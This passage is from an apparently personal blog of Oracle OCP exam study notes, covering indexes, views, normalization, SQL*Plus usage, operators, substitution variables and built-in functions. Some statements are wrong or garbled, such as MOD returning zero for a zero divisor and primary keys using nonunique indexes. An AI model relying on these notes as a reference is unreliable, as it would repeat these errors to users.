<li><p>B*Tree indexes: these can be either unique or nonunique. ->
Nonunique is the default. -> “B” stands for “balanced” .. A unique
index will not permit insertion of two rows with the same key values; ..
a nonunique index will permit as many rows as you want with the same
values.</p></li>
<li><p>Indexes will improve performance for data retrieval but reduce
performance for DML operations.</p></li>
<li><p>B*tree Index .. The root node of the tree points to many nodes at
the second level, which can point to many nodes at the third level, and
so on .. The necessary depth of the tree will be largely determined by
the number of rows in the table and the length of the index key
values.</p></li>
<li><p>The B*Tree structure is very efficient. If the depth is greater
then three or four, than either the index keys are very long or the
table has billions of rows. .. If neither if these is the case, then the
index is in need of a rebuild.</p></li>
<li><p>The leaf nodes of the index tree store the rows’ keys, in order,
each with a pointer that identifies the physical location of the
row</p></li>
<li><p>The pointer to the row is the rowid -> Oracle proprietary
pseudocolumn that every row in every table has .. Encrypted within it is
the physical address of the row.</p></li>
<li><p>ROWID: A row’s rowid is globally unique. Every row in every table
in the whole database will have a different rowid. .. The rowid
encryption gives the physical address of the row: from it, Oracle can
calculate which operating system file and where in the file the row is,
and go straight to it.</p></li>
<li><p>B*Tree indexes are very efficient if the number of rows needed is
low in proportion to the total number of rows in the table and if the
table is large</p></li>
<li><p>Often said that if the query is going to retrieve more than 2 to
4 percent of the rows, then a full table scan will be quicker. .. A
major exception to this is if the value specified in the WHERE clause is
NULL. NULLs do not go into B<em>Tree indexes .. select </em> from
employees where last_name is null; -> ALWAYS A FULL TABLE
SCAN</p></li>
<li><p>B*Tree index should not be used: .. On a column with few unique
values, as it will not be selective: .. The proportion of the table that
will be retrieved for each distinct key value will be too high</p></li>
<li><p>B*Tree indexes should be used if: .. The cardinality (the number
of distinct values) in the column is high, and .. The number of rows in
the table is high, and .. The column is used in WHERE clauses or JOIN
conditions</p></li>
<li><p>A Bitmap Index stores the rowids associated with each key value
as a bitmap .. WALKIN 11010111000101011101011101….. .. DELIVERY
00101000111010100010100010….. .. This means that the first row has the
column value of WALKIN, Second row as WALKIN, Third as DELIVERY .. So
every different value will be a bitmap, this includes NULLS as well
which will be a seperate bitmap</p></li>
<li><p><code>select count(*) from sales where channel='WALKIN' and shop='OXFORD';</code>
.. Oracle can retrieve the two relevant bitmaps and add them together
with a Boolean AND operation: .. The result of the AND operation shows
that only the seventh and sixteenth rows qualify for selection</p></li>
<li><p>A particular advantage that bitmap indexes have over B*Tree
indexes is that they include NULLs. As far as the bitmap index is
concerned, NULL is just another distinct value, which will have its own
bitmap.</p></li>
<li><p>Bitmap indexes should be used if: .. The cardinality (the number
of distinct values) in the column is low (such as male/female), and ..
The number of rows in the table is high, and .. The column is used in
Boolean algebra (AND/OR/NOT) operations</p></li>
<li><p><code>CREATE [UNIQUE | BITMAP] INDEX [ schema.]indexname ON [schema.]tablename (column [, column...] );</code>
.. The default type of index is a nonunique B*Tree index.</p></li>
<li><p>It is not possible to create a unique bitmap index</p></li>
<li><p>Indexes are schema objects, and it is possible to create an index
in one schema on a table in another</p></li>
<li><p>A composite index is an index on several columns .. Composite
indexes can be on columns of different data types, and the columns do
not have to be adjacent in the table.</p></li>
<li><p><code>create unique index dept_i1 on dept(deptno);</code> .. It
will not be possible to insert duplicate values</p></li>
<li><p><code>create index emp_i2 on emp(surname,forename);</code> ..
will accept duplicate values</p></li>
<li><p><code>create bitmap index emp_i3 on emp(deptno);</code> .. Bitmap
index</p></li>
<li><p>A unique and primary key constraint can be enforced by indexes
that are either unique or nonunique: .. In case of Pimary Key, it will
be a nonunique index that happens to have only unique values.</p></li>
<li><p>The Oracle server should make the best decision about index use,
but if it gets it wrong it is possible for a programmer to embed
instructions, known as OPTIMIZER HINTS, in code that will force the use
(or not) of certain indexes.</p></li>
<li><p>The ALTER INDEX command lies in the database administration
domain and would typically be used to adjust the physical properties of
the index, not the logical properties that are of interest to
developers</p></li>
<li><p>When a table is dropped, all the indexes and constraints defined
for the table are dropped as well. .. If an index was created implicitly
by creating a constraint, then dropping the constraint will also drop
the index. .. If the index had been created explicitly and the
constraint created later, then if the constraint is dropped the index
will survive.</p></li>
<li><p>Bitmap indexes cannot be unique. The keywords BITMAP and UNIQUE
are mutually exclusive .. A bitmap index can be composite, with columns
of different data types.</p></li>
<li><p>There is nothing known as a precompilation of Views. All the
views take the same time even with different types of joins</p></li>
<li><p><code>create view dept_v as select * from dept;</code></p></li>
<li><p><code>create synonym dept_s for dept_v;</code></p></li>
<li><p>Table -> View -> synonym .. If table is dropped and when
querying the synonym or the view, recompilation of view happens and
error is thrown</p></li>
<li><p>We can never know what would the nextval of a sequence is as
multiple sessions can be using it</p></li>
<li><p>A UNIQUE constraint on a column requires an index. -> If a
UNIQUE or NONUNIQUE index already exists on the column, it will be
used.</p></li>
</ol>Studying for OCP - Oracle Certifed Professional - Part 12009-02-12T00:00:00-08:002009-02-12T00:00:00-08:00Senthilkumar Gopaltag:sengopal.github.io,2009-02-12:/posts/studying-for-ocp-oracle-certifed-professional-part-1.htmlI am studying for the Oracle Certified Professional certification and following are notes which are specific to the certification, from the prep book. These notes are also helpful for a refresher on SQL syntax and usability.<p>I am studying for the Oracle Certified Professional certification and
following are notes which are specific to the certification, from the
prep book. These notes are also helpful for a refresher on SQL syntax
and usability.</p>
<h3 id="chapter-1">Chapter 1</h3>
<ol type="1">
<li>The client tier consists of two components: the users and the user
processes. The server tier has three components: the server processes
that execute the SQL, the instance, and the database itself.</li>
<li>User Processes - SQL*Plus and SQL Developer</li>
<li>Oracle Net - Proprietary client server software used by Oracle DB
for communication</li>
<li>Table <###> relation or an entity.</li>
<li>Rows <###> records or tuples, and columns <###>
attributes or fields.</li>
<li>No. of rows <###> cardinality of the tuples.</li>
<li>Hierarchical paradigm => Storing employees of each department
seperately</li>
</ol>
<ul>
<li>Rows are delimited by comma</li>
<li>Data retrieval is faster, updation is difficult</li>
</ul>
<ol start="8" type="1">
<li>Relation paradigm is useful in OLTP, DSS</li>
<li>Normalization - BOOKS Table - ISBN, Title, Author,
Publisher&Address</li>
</ol>
<ul>
<li>The first normal form is to remove the repeating groups - Make one
primary key per table</li>
<li>1st normal form - BOOKS - ISBN, Title, Publisher&Address AUTHORS
- Name, ISBN</li>
<li>The second normal form removes columns from the table that are not
dependent on the primary key</li>
<li>2nd Normal form - BOOKS - ISBN, Title, Publisher, AUTHORS - -do- ,
PUBLISHER - PUBLISHER,street, city, state</li>
<li>Third normal form removes all columns that are interdependent</li>
<li>3rd Normal form - PUBLISHERS - PUBLISHER, Address Code ADDRESSES -
Address Code, Street, City, State</li>
</ul>
<ol start="10" type="1">
<li><p>Every table should have a primary key defined.This is a
requirement of the relational paradigm. Note that the Oracle database
deviates from this standard: it is possible to define tables without a
primary key</p></li>
<li><p>Standards .. Primary key columns identified with a hash (#) ..
Foreign key columns identified with a back slash () .. Mandatory columns
(those that cannot be left empty) with an asterisk (*) .. Optional
columns with a lowercase <code>o</code></p></li>
<li><p>“crow’s feet” to indicate which sides of the relationship are the
many and the one.</p></li>
<li><p>SQL is managed by ISO and ANSI. .. ISO - Organisation
Internationale de Normalisation, based in Geneva .. ANSI - American
National Standards Institute, based in Washington, DC.</p></li>
<li><p>SQL Commands .. Data Manipulation Language (DML) commands:
SELECT, INSERT, UPDATE, DELETE, MERGE .. Data Definition Language (DDL)
commands: CREATE, ALTER, DROP, RENAME, TRUNCATE, COMMENT .. Data Control
Language (DCL) commands: GRANT, REVOKE .. Transaction Control Language
(TCL) commands: COMMIT, ROLLBACK, SAVEPOINT</p></li>
<li><p>SQL Tools .. SQL*Plus is a user process written in C. .. It
establishes a session against an instance and a database over the Oracle
Net protocol. .. The platforms for the client and the server can be
different /u01/app/oracle/product/db_1/bin/sqlplus - typical location ..
Env Variables required are: … The ORACLE_HOME - the set of files and
directories containing the executable code and some of the configuration
files. … PATH must include ORACLE_HOME/bin … LD_LIBRARY_PATH
ORACLE_HOME/lib. [but in practice you may get away without setting this]
… database username followed by a forward slash character as a
delimiter, then a password followed by an @ symbol as a delimiter, and
finally an Oracle Net connect identifier. … Ex: sqlplus
system/oracle@orc1 … executable file sqlplus.exe, and the graphical
version was sqlplusw.exe … Windows: D:\11.1.0_2.exe … Logon String:
system/oracle@orcl … sqlplus /nolog - to prevent it from immediately
presenting a login prompt
HKEY_LOCAL_MACHINE/SOFTWARE/ORACLE/KEY_OraDb11g_home1 - Registry Key for
Env Variables</p>
<p>… sqlplus scott/tiger@orcl - resolves the server orc1 using
tnsnames.ora or using LDAP [TNS - Transparent Network Substrate ] …
sqlplus scott/tiger@linsrv1.bplc.co.za:1521/orcl.bplc.com - Complete
details of server IP and port and the database service to connect to. …
SQL Developer - JDK1.5 is the prerequisite</p></li>
<li><p>Definitions .. A database user is a person who can log on to the
database. .. A database schema is all the objects in the database owned
by one user. .. CREATE SCHEMA command does not create a schema, it is
used for creating objects in a schema. .. A schema is initially created
empty, when a user is created with the CREATE USER command.</p></li>
</ol>
<ol start="17" type="1">
<li>Notes .. SQL, PL/SQL, and Java can all run in the database .. Third
normal form is the usual form aimed for by systems analysts when they
normalize data into relational structures. .. SQL Developer needs a
graphics terminal to display windows and JRE .. A schema and a user are
inseparable.</li>
</ol>
<h3 id="chapter-2">Chapter 2</h3>
<ol type="1">
<li>DESC[RIBE] <schema>.tablename</schema></li>
<li>access to a special table called DUAL, which belongs to the SYS
schema</li>
<li>NUMBER(p,s) -> precision and scale -> max number of digits
given in precision</li>
<li>CHAR data type utilizes storage inefficiently, padding any unused
components with spaces.</li>
<li>TIMESTAMP data type - introduction in Oracle 9i</li>
<li>Three concepts from relational theory encompass the capability of
the SELECT statement: projection, selection, and joining .. Projection
refers to the restriction of attributes (columns) selected from a
relation or table .. Selection refers to the restriction of the tuples
or rows selected from a relation (table) .. Joining, as a relational
concept, refers to the interaction of tables with each other in a
query</li>
<li>SELECT *|{[DISTINCT] column|expression [alias],…} FROM table;</li>
<li>DISTINCT performs a distinct for the combination of columns. Ex:
select distinct job_id, department_id from job_history;</li>
<li>SQL*Plus always requires a statement terminator, and usually a
semicolon is used.</li>
<li>Individual statements in SQL scripts are commonly terminated by a
line break (or carriage return) and a forward slash on the next line,
instead of a semicolon.</li>
<li>SELECT TABLE_NAME from USER_TABLES</li>
<li>Hierarchy</li>
</ol>
<div class="sourceCode" id="cb1"><pre class="sourceCode java"><code class="sourceCode java"><span id="cb1-1"><a aria-hidden="true" href="#cb1-1" tabindex="-1"></a> <span class="op">(</span> <span class="op">)</span> <span class="op">-</span> Brackets or parentheses</span>
<span id="cb1-2"><a aria-hidden="true" href="#cb1-2" tabindex="-1"></a> <span class="op">/</span> <span class="op">-</span> Division</span>
<span id="cb1-3"><a aria-hidden="true" href="#cb1-3" tabindex="-1"></a> <span class="op">*</span> <span class="op">-</span> Multiplication</span>
<span id="cb1-4"><a aria-hidden="true" href="#cb1-4" tabindex="-1"></a> <span class="op">-</span> <span class="op">-</span> Subtraction</span>
<span id="cb1-5"><a aria-hidden="true" href="#cb1-5" tabindex="-1"></a> <span class="op">+</span> <span class="op">-</span> Addition</span></code></pre></div>
<p>NOTE: Operations with the same level of precedence are evaluated from
left to right. If more than one operator with the same level of
precedence is present in an expression, then these will be evaluated
from left to right.</p>
<h3 id="chapter-2-continued">Chapter 2 Continued</h3>
<ol start="13" type="1">
<li><p>select col1 [AS] <alias> -> For column aliasing we can use
[as] or just a space - >using AS -> good SQL coding habit</alias></p></li>
<li><p>Most Common Errors .. ORA-00923: FROM keyword not found where
expected .. ORA-00942: table or view does not exist</p></li>
<li><p>Case preservation of an alias is only possible if the alias is
double quoted and double quotes are needed if the alias is more than one
word</p></li>
<li><p>“ORA-00923: FROM keyword not found where expected” - multi word
alias is not double quoted</p></li>
<li><p>|| represent the character concatenation operator</p></li>
<li><p>select ‘literal’||‘processing using the REGIONS table’ from
regions;</p></li>
<li><p>‘Plural’s with the literal ’Plural’’s</p></li>
<li><p>double quotes cannot be used</p></li>
<li><p>alternative quote (q) operator -> wrapping symbols ->
(round brackets), {curly braces}, [square brackets], or
<angle brackets=""></angle></p></li>
<li><p>Using the q operator, the character delimiter can effectively be
changed from a single quotation mark to any other character</p></li>
<li><p>format-> select q’X -> q’ is the notation and X is the
delimiter character Ex: select q’X’Test this String for Plural’s X’ “qX”
from dual; ‘Test this String for Plural’s X’ -> is the test
string</p></li>
<li><p>If we use one of the wrapping symbols, then q’<‘sdfgdfgd>’
can be given where ‘>’ is taken as the delimiter</p></li>
<li><p>Any arithmetic calculation with a NULL value always returns NULL.
even division by a null value results in null, unlike division by zero,
which results in an error</p></li>
<li><p>The character concatenation operators ignore null, whilst the
arithmetic operations involving null values always result in
null</p></li>
<li><p>All arithmetic operations with null will give null as the answer,
while concatenation will just ignore the null value and give the rest as
the answer</p></li>
</ol>
<h3 id="chapter-3">CHAPTER 3</h3>
<ol type="1">
<li>SELECT *|{[DISTINCT] column|expression [alias],…} FROM table [WHERE
condition(s)];</li>
<li>where salary = 10000; where salary = ‘10000’;Both formats are
acceptable to Oracle since an implicit data type conversion is performed
when necessary.</li>
<li>String concatenations and arithmetic operations can also be used in
the WHERE clause</li>
<li>The literals are automatically converted into DATE values based on
the default date format, which is DD-MON-RR. [RR means 50-99 will be
1950 to 1999 and 0-50 will be 2000 and 2050]</li>
<li>That DATE values are only equal to each other if there is an exact
match between all their components including day, month, year, hours,
minutes, and seconds.</li>
<li>The entire four-digit year component (YYYY) can been specified</li>
<li>START_DATE + 30 returns a DATE 30 days later than the
start_date</li>
<li>END_DATE - START_DATE gives a NUMBEr</li>
<li>Not Equal - != (or) <></li>
<li>Testing character inequality : the strings being compared on either
side of the inequality operator are converted to a numeric
representation of its character [same for < or >]</li>
<li>The Oracle server stores dates in an internal numeric format, and
these values are compared within the conditions.</li>
<li>BETWEEN <###> >= and <=</li>
<li>IN operator - equivalent to multiple ORs</li>
<li>wildcards - % [0 or more characters] and _ [1 character]</li>
<li>like ‘%’ - all rows with the values NOT NULL</li>
<li>% and _ can be escaped using ‘' [backslash] and denoted as like ’a%’
ESACPE ’'</li>
<li>we can changed the Escape character as well</li>
<li>For Null checks always use IS NULL</li>
<li>FOR AND operator - If the row contains a NULL value that causes one
of the conditions to evaluate to NULL, then that row is excluded</li>
<li>SELECT * FROM EMPLOYEES WHERE SALARY LIKE ‘%80%’; - Oracle
temporarily changes the NUMBER to CHAR data for the comparison</li>
<li>Usage of NOT: where NOT (last_name=‘King’), where first_name NOT
LIKE ‘R%’,where department_id NOT IN (10,20,30),where salary NOT BETWEEN
1 and 3000,where commission_pct IS NOT NULL</li>
<li>WHERE A and B or C or D and E, then a row will be returned if both
conditions A and B are fulfilled, or only condition C is met, or only
condition D is met, or both conditions D and E are fulfilled. Conditions
seperated by AND needs both to be satisfied while OR needs only one of
them to be satisfied</li>
<li>Precedence</li>
</ol>
<div class="sourceCode" id="cb2"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb2-1"><a aria-hidden="true" href="#cb2-1" tabindex="-1"></a> <span class="kw">NOT</span>] <span class="kw">LIKE</span>, <span class="kw">IS</span> [<span class="kw">NOT</span>] <span class="kw">NULL</span>, [<span class="kw">NOT</span>] <span class="kw">IN</span></span>
<span id="cb2-2"><a aria-hidden="true" href="#cb2-2" tabindex="-1"></a> [<span class="kw">NOT</span>] <span class="kw">BETWEEN</span></span>
<span id="cb2-3"><a aria-hidden="true" href="#cb2-3" tabindex="-1"></a> <span class="op">!=</span>,<span class="op"><></span></span>
<span id="cb2-4"><a aria-hidden="true" href="#cb2-4" tabindex="-1"></a> <span class="kw">NOT</span></span>
<span id="cb2-5"><a aria-hidden="true" href="#cb2-5" tabindex="-1"></a> <span class="kw">AND</span></span>
<span id="cb2-6"><a aria-hidden="true" href="#cb2-6" tabindex="-1"></a> <span class="kw">OR</span></span></code></pre></div>
<ol start="24" type="1">
<li>SELECT *|{[DISTINCT] column|expression [alias],…} FROM table [WHERE
condition(s)] [ORDER BY {col(s)|expr|numeric_pos} [ASC|DESC] [NULLS
FIRST|LAST]];</li>
<li>The default sort order is assumed to be NULLS LAST for ascending
sorts and NULLS FIRST for descending sorts.</li>
<li>If no ORDER BY clause is specified, the same query executed at
different times may return the same set of results in different row
order, so no assumptions should be made regarding the default row
order.</li>
<li>Positional sorting applies only to columns in the SELECT list that
have a numeric position associated with them</li>
<li>Composite Sorting: order by job_id desc, last_name, 3 desc;</li>
<li>The ampersand character (&) is the symbol chosen to designate a
substitution variable in a statement and precedes the variable name with
no spaces between them</li>
<li>When the statement is executed, the Oracle server processes the
statement, notices a substitution variable, and attempts to resolve this
variable’s value in one of two ways. .. First, it checks whether the
variable is defined in the user session. (The DEFINE command). .. If the
variable is not defined, the user process prompts for a value that will
be substituted in place of the variable. .. Once a value is submitted,
the statement is complete and is executed by the Oracle server. .. The
ampersand substitution variable is resolved at execution time and is
sometimes known as runtime binding or runtime substitution.</li>
<li>SUBSTITUTION: any alphanumeric name and invalid data type gives
ORA-00904: invalid identifier error is returned.</li>
<li>Date and Character literals need to be enclosed within quotes. Best
Practice is to define the substitution with quotes so that the date and
character will be quoted without the user need</li>
<li>When the Oracle server encounters a double ampersand substitution
variable, a session value is defined for that variable and you are not
prompted to enter a value to be substituted for this variable in
subsequent references.</li>
<li>To undefine the SEARCH variable, you need to use the UNDEFINE
command</li>
<li>any element of a SQL statement is a candidate for substitution</li>
<li>column name references do not require single quotes both when
explicitly specified and when substituted via ampersand
substitution</li>
<li>DEFINE command can be used to retrieve a list of all the variables
currently defined in your SQL session</li>
<li>It can also be used to explicitly define a value for a variable
referenced as a substitution variable by one or more statements during
the lifetime of that session.</li>
<li>SET DEFINE OFF -> Makes & as an ordinary character</li>
<li>The VERIFY command controls whether the substitution variable
submitted is displayed onscreen so you can verify that the correct
substitution has occurred</li>
<li>SET VERIFY ON|OFF</li>
<li>VERIFY is switched ON, the query is executed, and you are prompted
to input a value. Once the value is input and before the statement
commences execution, Oracle displays the clause containing the reference
to the substitution variable as the old clause with its line number and,
immediately below this, the new clause displays the statement containing
the substituted value.</li>
<li>NULLS LAST can be applied in the ORDER BY clause for every column -
ORDER BY 3 DESC NULLS LAST, 2 ASC;</li>
</ol>
<h3 id="chapter-4">CHAPTER 4</h3>
<ol type="1">
<li>case conversion - LOWER, UPPER, and INITCAP</li>
<li>character manipulation - LENGTH, CONCAT, SUBSTR, INSTR, LPAD, RPAD,
TRIM, and REPLACE</li>
<li>CONCAT takes only two strings are parameters</li>
<li>SUBSTR(string, start position, number of characters) - 1 indexed ..
if the position is not found -> gives no result .. if the length is
larger, returns only the available characters</li>
<li>INSTR -> similar to indexOf -> INSTR(source string, search
item, [start position],[nth occurrence of search item]) -> returns 0
if not found</li>
<li>LPAD(string, length after padding, padding string) and RPAD(string,
length after padding, padding string)</li>
<li>TRIM - > by default trims spaces TRIM(‘#’ from ‘#PASS#WORD##’)
-> ‘PASS#WORD’</li>
<li>REPLACE(string, search item, replacement item) - All the
instances</li>
<li>ROUND, TRUNC, MOD - Numeric functions</li>
<li>ROUND(number, decimal precision) - round(42.39,1) = 42.4 ->
>=5 will be rounded to its ceiling</li>
<li>TRUNC -> just drops the additional numerals - trunc(42.39,1) =
42.3</li>
<li>MOD(dividend, divisor) -> mod(42,10) = 2</li>
<li>MONTHS_BETWEEN, ADD_MONTHS, LAST_DAY, NEXT_DAY, SYSDATE, ROUND, and
TRUNC -> date functions</li>
<li>MONTHS_BETWEEN(greater_date, smaller_date) ->
MONTHS_BETWEEN(‘2-JAN-2008’,‘01-JAN-2008’) -> .0322 -> stored as a
decimal value. Need to TRUNC to get only the MONTHS value</li>
<li>LAST_DAY(date 1) function returns the last day of the month that the
specified date falls into,</li>
<li>NEXT_DAY(date 1, day of the week) returns the date on which the next
specified day of the week falls after the given date (if day of the week
is not valid, throws error)</li>
<li>SYSDATE function takes no parameters and returns a date value that
represents the current server date and time</li>
<li>ROUND(date, date precision format) and TRUNC(date, date precision
format) round and truncate a given date value to the nearest date
precision format like day, month, or year:</li>
</ol>
<div class="sourceCode" id="cb3"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb3-1"><a aria-hidden="true" href="#cb3-1" tabindex="-1"></a><span class="fu">sysdate</span> <span class="op">=</span> <span class="dv">17</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">2007</span></span>
<span id="cb3-2"><a aria-hidden="true" href="#cb3-2" tabindex="-1"></a><span class="fu">round</span>(<span class="fu">sysdate</span>,<span class="st">'month'</span>) <span class="op">=</span> <span class="dv">01</span><span class="op">-</span>JAN<span class="op">-</span><span class="dv">2008</span></span>
<span id="cb3-3"><a aria-hidden="true" href="#cb3-3" tabindex="-1"></a><span class="fu">trunc</span>(<span class="fu">sysdate</span>,<span class="st">'month'</span>) <span class="op">=</span> <span class="dv">01</span><span class="op">-</span><span class="dt">DEC</span><span class="op">-</span><span class="dv">2007</span></span>
<span id="cb3-4"><a aria-hidden="true" href="#cb3-4" tabindex="-1"></a>[Works <span class="kw">only</span> <span class="kw">in</span> <span class="dv">11</span>g]</span></code></pre></div>
<ol start="19" type="1">
<li><p>Oracle’s implementation of SQL is compliant with the ANSI:1999
(American National Standards Institute) standard for SQL. .. More
recently, it claimed partial compliance to the SQL:2003 standard
endorsed by both ISO (International Organization for Standardization)
and ANSI. .. SQL functions have been standardized, and Oracle has
documented those that are fully or partially compliant to the SQL:2003
standard.</p></li>
<li><p>Character Case Conversion Functions - If parameters are numeric
or date value, it is implicitly converted into a string.</p></li>
<li><p>select lower(‘The SUM’||‘100+100’||’ = ’||(100+100)) from dual
-> the sum 100+100 = 200. Calculations are done if inside
bracket</p></li>
<li><p>(SYSDATE+2) -> Adds two days</p></li>
<li><p>select initcap(‘init cap or init_cap or init%cap’) from dual
-> Init Cap Or Init_Cap Or Init%Cap .. space, _,%,!, $ are all used
as word seperators. Punctuation or special characters are regarded as
valid word separators.</p></li>
<li><p>concat(1+2.14,’ approximates pi’) -> 3.14 approximates
pi</p></li>
<li><p>LPAD(s, n, p) and RPAD(s, n, p), .. if the parameter n is smaller
than or equal to the length of the source string s, then no padding
occurs and only the first n characters of s are returned</p></li>
<li><p>TRIM([trailing|leading|both] trimstring from s). .. TRIM(trailing
trimstring from s) removes all occurrences of trimstring from the end of
the string s if it is present .. TRIM(leading trimstring from s) removes
all occurrences of trimstring from the beginning of the string s if it
is present. .. TRIM(both trimstring from s) removes all occurrences of
trimstring from the beginning and end of the string s if it is present
.. [both appears to be optional]</p></li>
<li><p>INSTR(source string, search string, [search start position], [nth
occurrence]) .. A negative number for the start position gives the
occurence from the End instead of the beginning .. However, if the
Occurence is ignored, then it just does a absolute of the
position</p></li>
<li><p>SUBSTR(source string, start position, [number of characters to
extract]) -> negative number in start position begins the search from
that position from the End of the String</p></li>
<li><p>REPLACE(source string, search item, [replacement term]) If the
replacement term parameter is omitted, each occurrence of the search
item is removed from the source string</p></li>
<li><p>If the specified decimal precision is n, the digit significant to
the rounding is found (n + 1) places to the RIGHT of the decimal point.
.. If it is negative, the digit significant to the rounding is found n
places to the LEFT of the decimal point. .. If the numeric value of the
significant digit is greater than or equal to 5, a “round up” occurs,
else a “round down” occurs. .. round(1301.916718,-3) -> 1000 ..
round(1601.916718,-3) -> 2000 .. round(1601.916718) ->
1602</p></li>
<li><p>A numeric truncation is different from rounding because the
resulting value drops the numbers at the decimal precision specified and
does not attempt to round up or down if the decimal precision is
positive. .. However, if the decimal precision specified (n) is
negative, the input value is zeroed down from the nth decimal position.
.. trunc(1301.916718,-3) -> 1000 .. trunc(1601.916718,-3) -> 1000
.. trunc(1601.916718) -> 1601</p></li>
<li><p>The MOD function returns the numeric remainder of a division
operation .. If the divisor is zero, no division by zero error is
returned and the MOD function returns a zero instead .. If the divisor
is larger than the dividend, then the MOD function returns the dividend
as its result .. MOD(5.2,3) -> 2.2 .. MOD(7,0) -> 0 [result is 7
in 10g] .. MOD(0,7) -> 0 .. MOD(7,35) -> 7</p></li>
<li><p>The default format of the results comprises two digits that
represent the day, a three-letter abbreviation of the month, and two
digits representing the year component. .. By default, these components
are separated with hyphens in SQL*Plus and forward slashes in SQL
Developer 34.. Date Format Mask</p></li>
</ol>
<div class="sourceCode" id="cb4"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb4-1"><a aria-hidden="true" href="#cb4-1" tabindex="-1"></a> DD <span class="dt">Day</span> <span class="kw">of</span> <span class="kw">the</span> <span class="dt">month</span></span>
<span id="cb4-2"><a aria-hidden="true" href="#cb4-2" tabindex="-1"></a> MON <span class="dt">Month</span> <span class="kw">of</span> <span class="kw">the</span> <span class="dt">year</span></span>
<span id="cb4-3"><a aria-hidden="true" href="#cb4-3" tabindex="-1"></a> YY Two<span class="op">-</span>digit <span class="dt">year</span></span>
<span id="cb4-4"><a aria-hidden="true" href="#cb4-4" tabindex="-1"></a> YYYY Four<span class="op">-</span>digit <span class="dt">year</span> <span class="kw">including</span> century</span>
<span id="cb4-5"><a aria-hidden="true" href="#cb4-5" tabindex="-1"></a> RR Two<span class="op">-</span>digit <span class="dt">year</span> (<span class="dt">Year</span> <span class="dv">2000</span>–compliant)</span>
<span id="cb4-6"><a aria-hidden="true" href="#cb4-6" tabindex="-1"></a> CC Two<span class="op">-</span>digit century</span>
<span id="cb4-7"><a aria-hidden="true" href="#cb4-7" tabindex="-1"></a> HH Hours <span class="kw">with</span> AM <span class="kw">and</span> PM</span>
<span id="cb4-8"><a aria-hidden="true" href="#cb4-8" tabindex="-1"></a> HH24 Twenty<span class="op">-</span>four<span class="op">-</span><span class="kw">hour</span> <span class="dt">time</span></span>
<span id="cb4-9"><a aria-hidden="true" href="#cb4-9" tabindex="-1"></a> MI Minutes</span>
<span id="cb4-10"><a aria-hidden="true" href="#cb4-10" tabindex="-1"></a> SS Seconds</span></code></pre></div>
<ol start="35" type="1">
<li><p>The SYSDATE function returns the DD-MON-RR components of the
current system date</p></li>
<li><p>Date1 - Date2 = Num1; Date1 - Num1 = Date2; Date1 = Date2 +
Num1;</p></li>
<li><p>use 6/24 to add hours</p></li>
<li><p>MONTHS_BETWEEN(start date, end date)</p></li>
<li><p>ADD_MONTHS (start date, number of months) .. The number of months
may be negative, resulting in a target date earlier than the start date
being returned. .. The number of months may be fractional, but the
fractional component is ignored and the integer component is
used</p></li>
<li><p>NEXT_DAY (start date, day of the week) .. The acceptable values
are determined by the NLS_DATE_LANGUAGE database parameter but the
default values are at least the first three characters of the day name
or integer values, where 1 represents Sunday, 2 represents Monday, and
so on. .. NEXT_DAY(‘02-JAN-2009’,‘WEDNE’) -> Works using the First
three chars ‘WED’</p></li>
<li><p>LAST_DAY(start date)</p></li>
<li><p>ROUND(source date, [date precision format]) -> [No implicit
conversion for DATE] .. The date precision format parameter specifies
the degree of rounding and is optional. If it is absent, the default
degree of rounding is day. .. The date precision formats include century
(CC), year (YYYY or YEAR), quarter (Q), month (MM or MONTH), week (W),
day (DD), hour (HH), and minute (MI)</p></li>
<li><p>Rounding up to century is equivalent to adding one to the current
century. .. Rounding up to the next month occurs if the day component is
greater than 15(> 15) , else rounding down to the beginning of the
current month occurs. .. If the month falls between one and six, then
rounding to year returns the date at the beginning of the current year,
else it returns the date at the beginning of the following year</p></li>
<li><p>TRUNC(source date, [date precision format]) .. The date precision
format parameter specifies the degree of truncation and is optional. ..
If it is absent, the default degree of truncation is day .. Any time
component of the source date is set to midnight or 00:00:00 .. TRUNC is
similar to ROUND, except it is always the FLOOR and never the CEILING ..
TRUNC(TO_DATE(‘31-JAN-2009’),‘MM’) -> 01-JAN-2009</p></li>
<li><p>Functions dont need parameters</p></li>
</ol>
<h3 id="chapter-5">Chapter 5</h3>
<ol type="1">
<li>length(1234) -> implicit conversion for numbers and dates to char
-> 4 is the result</li>
<li>mod(‘11’,2) -> implicit conversion - .. mod(‘$11’,2) ->
ORA-1722: invalid number</li>
<li>Implicit date conversion should not have Time parameters [Check
this]. Implicit conversion for dates can occur if the pattern follows
<code>[D|DD] separator1 [MON|MONTH] separator2 [R|RR|YY|YYYY]</code>
<em>separator1 and separator2 elements may be most punctuation marks,
spaces, and tabs</em></li>
</ol>
<div class="sourceCode" id="cb5"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb5-1"><a aria-hidden="true" href="#cb5-1" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'1\january/8'</span>,<span class="dv">1</span>) <span class="op">-></span> <span class="dv">01</span><span class="op">/</span>FEB<span class="op">/</span><span class="dv">08</span></span>
<span id="cb5-2"><a aria-hidden="true" href="#cb5-2" tabindex="-1"></a><span class="fu">months_between</span>(<span class="st">'13*jan*8'</span>, <span class="st">'13/mar/2008'</span>) <span class="op">-></span> <span class="op">-</span><span class="dv">2</span></span>
<span id="cb5-3"><a aria-hidden="true" href="#cb5-3" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'01$jan/08'</span>,<span class="dv">1</span>) <span class="op">-></span> <span class="dv">01</span><span class="op">/</span>FEB<span class="op">/</span><span class="dv">08</span></span>
<span id="cb5-4"><a aria-hidden="true" href="#cb5-4" tabindex="-1"></a><span class="fu">add_months</span>(<span class="st">'13!jana08'</span>,<span class="dv">1</span>) <span class="op">-></span> ORA<span class="op">-</span><span class="dv">1841</span>: (<span class="kw">full</span>) <span class="dt">year</span> must be <span class="kw">between</span> –<span class="dv">4713</span> <span class="kw">and</span> <span class="op">+</span><span class="dv">9999</span> <span class="kw">and</span> <span class="kw">not</span> be <span class="dv">0</span></span>
<span id="cb5-5"><a aria-hidden="true" href="#cb5-5" tabindex="-1"></a>jana <span class="kw">is</span> <span class="kw">not</span> a valid <span class="dt">month</span> <span class="op">-></span> <span class="kw">only</span> <span class="dv">3</span> characters <span class="kw">or</span> <span class="kw">full</span> <span class="dt">month</span> <span class="kw">is</span> allowed</span>
